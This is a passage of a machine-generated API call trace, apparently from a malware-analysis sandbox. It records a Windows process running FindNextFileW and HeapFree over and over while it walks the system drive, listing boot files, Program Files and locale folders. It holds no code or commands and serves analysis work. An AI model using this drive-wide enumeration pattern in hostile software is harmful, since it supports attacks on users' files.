cAlternateFileName="UPDATE~1.P7B")) returned 1 [0178.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.488] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0178.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.488] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0178.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.488] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0178.488] FindClose (in: hFindFile=0x43a2c98 | out: hFindFile=0x43a2c98) returned 1 [0178.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.489] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0178.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.490] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0178.490] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.490] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x762f67e4, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0178.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.507] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x779cb26e, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0178.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.507] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0178.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.508] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0178.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.512] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0178.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.513] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0178.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.513] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0178.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.514] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0178.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.514] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0178.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.514] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0178.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.515] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0178.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.515] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.516] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0178.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.516] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0178.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.516] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0178.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.517] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0178.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.517] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0178.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.518] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0178.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.518] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0178.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.519] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0178.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.519] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0178.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.520] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0178.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.522] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0178.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.523] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0178.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.523] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0178.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.523] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0178.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.524] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0178.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.524] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0178.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.525] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0178.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.525] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0178.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.525] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0178.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.526] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0178.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.526] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0178.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.526] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0178.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: 